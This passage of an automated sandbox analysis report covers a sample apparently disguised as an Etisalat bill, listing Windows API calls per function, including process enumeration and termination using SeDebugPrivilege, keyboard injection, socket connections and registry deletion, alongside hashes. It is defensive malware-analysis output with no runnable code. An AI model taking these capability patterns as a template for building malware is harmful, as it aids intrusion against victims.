                                      • Instruction Fuzzy Hash: 8141C370944389AFEB219F64CC85BEE77E8EF08350F1004AAF544E7292DB719D84CB60
                                      APIs
                                        • Part of subcall function 00BC3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00BC3EB6
                                        • Part of subcall function 00BC3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00BC3EC4
                                        • Part of subcall function 00BC3E91: CloseHandle.KERNEL32(00000000), ref: 00BC3F8E
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BDECB8
                                      • GetLastError.KERNEL32 ref: 00BDECCB
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BDECFA
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BDED77
                                      • GetLastError.KERNEL32(00000000), ref: 00BDED82
                                      • CloseHandle.KERNEL32(00000000), ref: 00BDEDB7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: 33c41996d09f47128217b4c496e8d7b451077cb42dd8701cd35bf164d5ce7a76
                                      • Instruction ID: d6c5e24394ef4345a74368f12b21eed63439d4a20897ff8cf1ba41195ceb8872
                                      • Opcode Fuzzy Hash: 33c41996d09f47128217b4c496e8d7b451077cb42dd8701cd35bf164d5ce7a76
                                      • Instruction Fuzzy Hash: 914158712002019FDB14EF24C895F79B7E5AF84714F0884A9F9569F2D2DFB9A804CB96
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 00BC32C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BC454E
                                      • LoadStringW.USER32(00000000), ref: 00BC4555
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BC456B
                                      • LoadStringW.USER32(00000000), ref: 00BC4572
                                      • _wprintf.LIBCMT ref: 00BC4598
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BC45B6
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00BC4593
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 3648134473-3128320259
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • GetSystemMetrics.USER32(0000000F), ref: 00BED78A
                                      • GetSystemMetrics.USER32(0000000F), ref: 00BED7AA
                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BED9E5
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BEDA03
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BEDA24
                                      • ShowWindow.USER32(00000003,00000000), ref: 00BEDA43
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00BEDA68
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BEDA8B
                                      Similarity
                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                      • String ID:
                                      • API String ID: 1211466189-0
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B9C417,00000004,00000000,00000000,00000000), ref: 00B62ACF
                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B9C417,00000004,00000000,00000000,00000000,000000FF), ref: 00B62B17
                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B9C417,00000004,00000000,00000000,00000000), ref: 00B9C46A
                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B9C417,00000004,00000000,00000000,00000000), ref: 00B9C4D6
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BC737F
                                        • Part of subcall function 00B80FF6: std::exception::exception.LIBCMT ref: 00B8102C
                                        • Part of subcall function 00B80FF6: __CxxThrowException@8.LIBCMT ref: 00B81041
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BC73B6
                                      • EnterCriticalSection.KERNEL32(?), ref: 00BC73D2
                                      • _memmove.LIBCMT ref: 00BC7420
                                      • _memmove.LIBCMT ref: 00BC743D
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00BC744C
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BC7461
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BC7480
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 256516436-0
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00BE645A
                                      • GetDC.USER32(00000000), ref: 00BE6462
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BE646D
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00BE6479
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BE64B5
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BE64C6
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BE9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00BE6500
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BE6520
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                        • Part of subcall function 00B7FEC6: _wcscpy.LIBCMT ref: 00B7FEE9
                                      • _wcstok.LIBCMT ref: 00BCEEFF
                                      • _wcscpy.LIBCMT ref: 00BCEF8E
                                      • _memset.LIBCMT ref: 00BCEFC1
                                      Similarity
                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                      • String ID: X
                                      • API String ID: 774024439-3081909835
                                      APIs
                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00BD6F14
                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BD6F35
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6F48
                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00BD6FFE
                                      • inet_ntoa.WSOCK32(?), ref: 00BD6FBB
                                        • Part of subcall function 00BBAE14: _strlen.LIBCMT ref: 00BBAE1E
                                        • Part of subcall function 00BBAE14: _memmove.LIBCMT ref: 00BBAE40
                                      • _strlen.LIBCMT ref: 00BD7058
                                      • _memmove.LIBCMT ref: 00BD70C1
                                      Similarity
                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                      • String ID:
                                      • API String ID: 3619996494-0
                                      APIs
                                      • IsWindow.USER32(016458D8), ref: 00BEB6A5
                                      • IsWindowEnabled.USER32(016458D8), ref: 00BEB6B1
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BEB795
                                      • SendMessageW.USER32(016458D8,000000B0,?,?), ref: 00BEB7CC
                                      • IsDlgButtonChecked.USER32(?,?), ref: 00BEB809
                                      • GetWindowLongW.USER32(016458D8,000000EC), ref: 00BEB82B
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BEB843
                                      Similarity
                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                      • String ID:
                                      • API String ID: 4072528602-0
                                      APIs
                                      • _memset.LIBCMT ref: 00BDF75C
                                      • _memset.LIBCMT ref: 00BDF825
                                      • ShellExecuteExW.SHELL32(?), ref: 00BDF86A
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                        • Part of subcall function 00B7FEC6: _wcscpy.LIBCMT ref: 00B7FEE9
                                      • GetProcessId.KERNEL32(00000000), ref: 00BDF8E1
                                      • CloseHandle.KERNEL32(00000000), ref: 00BDF910
                                      Similarity
                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                      • String ID: @
                                      • API String ID: 3522835683-2766056989
                                      APIs
                                      • GetParent.USER32(?), ref: 00BC149C
                                      • GetKeyboardState.USER32(?), ref: 00BC14B1
                                      • SetKeyboardState.USER32(?), ref: 00BC1512
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BC1540
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BC155F
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BC15A5
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BC15C8
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      APIs
                                      • GetParent.USER32(00000000), ref: 00BC12B5
                                      • GetKeyboardState.USER32(?), ref: 00BC12CA
                                      • SetKeyboardState.USER32(?), ref: 00BC132B
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BC1357
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BC1374
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BC13B8
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BC13D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: a04713da6fcd96cd8edae5bdc389848a3014a5c8a9fd726fcdf5427c3bdd5ebb
                                      • Instruction ID: bbb92e00ef4cb2386eb869f88e7b25d4d8b2cd549760c67b7fe2959548a878a5
                                      • Opcode Fuzzy Hash: a04713da6fcd96cd8edae5bdc389848a3014a5c8a9fd726fcdf5427c3bdd5ebb
                                      • Instruction Fuzzy Hash: 6651E2A06046D53DFB3687288C45F7ABFE99B47304F0888CDE1D46A8C3D394AC94D764
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$LocalTime
                                      • String ID:
                                      • API String ID: 2945705084-0
                                      • Opcode ID: 5a7362b1a8ddf071d7511643bff6e7718fd09133036dfa40cbadbd0d29901025
                                      • Instruction ID: c4b6f5716d3a76d7caa650c050849a58282c97bdeaa0c5c16f494a29c420fd90
                                      • Opcode Fuzzy Hash: 5a7362b1a8ddf071d7511643bff6e7718fd09133036dfa40cbadbd0d29901025
                                      • Instruction Fuzzy Hash: 4F416069C20618B6CB11FBB5888AECFB3F89F05710F508596F918E3122E734E755C7A9
                                      APIs
                                        • Part of subcall function 00BC48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BC38D3,?), ref: 00BC48C7
                                        • Part of subcall function 00BC48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BC38D3,?), ref: 00BC48E0
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00BC38F3
                                      • _wcscmp.LIBCMT ref: 00BC390F
                                      • MoveFileW.KERNEL32(?,?), ref: 00BC3927
                                      • _wcscat.LIBCMT ref: 00BC396F
                                      • SHFileOperationW.SHELL32(?), ref: 00BC39DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 1377345388-1173974218
                                      • Opcode ID: 367f54a0e1574ac5573d7564a17e9178be6df825b57ff03446d8f4ba5fd0d9f5
                                      • Instruction ID: c199b949d1048043dbb389cf47793a8eab6a9a39e42e8f221c2cb9eb0d025584
                                      • Opcode Fuzzy Hash: 367f54a0e1574ac5573d7564a17e9178be6df825b57ff03446d8f4ba5fd0d9f5
                                      • Instruction Fuzzy Hash: 0F418DB25083849AC751EF64C481EEFB7E8EF88740F4049AEB49AC3161EB74D788C752
                                      APIs
                                      • _memset.LIBCMT ref: 00BE7519
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BE75C0
                                      • IsMenu.USER32(?), ref: 00BE75D8
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BE7620
                                      • DrawMenuBar.USER32 ref: 00BE7633
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                      • String ID: 0
                                      • API String ID: 3866635326-4108050209
                                      • Opcode ID: 212af269e7defba2db0b50b8ff2172deea4911d5d817c307b2d719edb244d3d0
                                      • Instruction ID: adeae8b70e98e22bf90b4ad1368c9a4d224b190e2f5fbed4644f17959b4b60f6
                                      • Opcode Fuzzy Hash: 212af269e7defba2db0b50b8ff2172deea4911d5d817c307b2d719edb244d3d0
                                      • Instruction Fuzzy Hash: 48415A75A04689EFDB20DF55D884EAABBF8FF54315F0480A9E9159B290DB30AD50CFA0
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BE125C
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BE1286
                                      • FreeLibrary.KERNEL32(00000000), ref: 00BE133D
                                        • Part of subcall function 00BE122D: RegCloseKey.ADVAPI32(?), ref: 00BE12A3
                                        • Part of subcall function 00BE122D: FreeLibrary.KERNEL32(?), ref: 00BE12F5
                                        • Part of subcall function 00BE122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BE1318
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BE12E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 395352322-0
                                      • Opcode ID: 276f543fc915b229ff53968662c30cae0e7bb0c5acddd617ec71ac0e56d71ba3
                                      • Instruction ID: add257e8232e7f352f774fcbb4ebbb4107ce5de363af606d973ebe54ffd0e330
                                      • Opcode Fuzzy Hash: 276f543fc915b229ff53968662c30cae0e7bb0c5acddd617ec71ac0e56d71ba3
                                      • Instruction Fuzzy Hash: 1A3149B1901149BFDB14DF95DC89AFEB7BCEF08300F1005AAE502E3141EB749F499AA4
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BE655B
                                      • GetWindowLongW.USER32(016458D8,000000F0), ref: 00BE658E
                                      • GetWindowLongW.USER32(016458D8,000000F0), ref: 00BE65C3
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BE65F5
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BE661F
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00BE6630
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BE664A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 3833a30edcfc5c34d9f63864fc4e130b372297df77239e9a74da9515794ff559
                                      • Instruction ID: 56c729a78ff53ffff1565f61ffe40553c9f2dd045650df332dac52628834d982
                                      • Opcode Fuzzy Hash: 3833a30edcfc5c34d9f63864fc4e130b372297df77239e9a74da9515794ff559
                                      • Instruction Fuzzy Hash: DA31E130714295AFDB208F1ADC89F693BE1FB6A790F1901A8F5118F2B6CB61AC40DB51
                                      APIs
                                        • Part of subcall function 00BD80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BD80CB
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BD64D9
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD64E8
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BD6521
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00BD652A
                                      • WSAGetLastError.WSOCK32 ref: 00BD6534
                                      • closesocket.WSOCK32(00000000), ref: 00BD655D
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BD6576
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 910771015-0
                                      • Opcode ID: 86e9d05145705c184aafd97dd3d7e42baa2219711a75d9913fcd10706f04bfc8
                                      • Instruction ID: 1afe21c64ea87c6e88c36d6ed4ee0cbf039d8ec82d009e28900581d081c42da5
                                      • Opcode Fuzzy Hash: 86e9d05145705c184aafd97dd3d7e42baa2219711a75d9913fcd10706f04bfc8
                                      • Instruction Fuzzy Hash: 03319331600118AFEB10AF64DC85BBEBBEDEF45714F0480AAF9059B391EB74AD44CB61
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BBE0FA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BBE120
                                      • SysAllocString.OLEAUT32(00000000), ref: 00BBE123
                                      • SysAllocString.OLEAUT32 ref: 00BBE144
                                      • SysFreeString.OLEAUT32 ref: 00BBE14D
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00BBE167
                                      • SysAllocString.OLEAUT32(?), ref: 00BBE175
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 31461e8bb44e7df9ccf7fa50891e24abf26151e2819b4138fca310a2c8dc929a
                                      • Instruction ID: ebc7222f1319a7592c3a125db3c9a7529f0b560c4536a42b4bdc8575e65d37a9
                                      • Opcode Fuzzy Hash: 31461e8bb44e7df9ccf7fa50891e24abf26151e2819b4138fca310a2c8dc929a
                                      • Instruction Fuzzy Hash: CE216275605109AF9B10AFACDCC9CFB77ECEB09760B508165FA25DB2B0DAB0DC418B64
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BEB44C
                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BEB471
                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BEB489
                                      • GetSystemMetrics.USER32(00000004), ref: 00BEB4B2
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BD1184,00000000), ref: 00BEB4D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Long$MetricsSystem
                                      • String ID: -es
                                      • API String ID: 2294984445-508736453
                                      • Opcode ID: dcfacf9583add3ba8a4395addcad773735439c63e6235402cb2b85360e0679b2
                                      • Instruction ID: c3a6a850be76fea3d6303f8a75652d584d71159103ac548f98f38799016fd240
                                      • Opcode Fuzzy Hash: dcfacf9583add3ba8a4395addcad773735439c63e6235402cb2b85360e0679b2
                                      • Instruction Fuzzy Hash: 362180715102A6AFDB208F39DC84F6A37F4EB05720B1047B8F926D72E1E7309911DB90
                                      APIs
                                        • Part of subcall function 00B61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B61D73
                                        • Part of subcall function 00B61D35: GetStockObject.GDI32(00000011), ref: 00B61D87
                                        • Part of subcall function 00B61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B61D91
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BE78A1
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BE78AE
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BE78B9
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BE78C8
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BE78D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
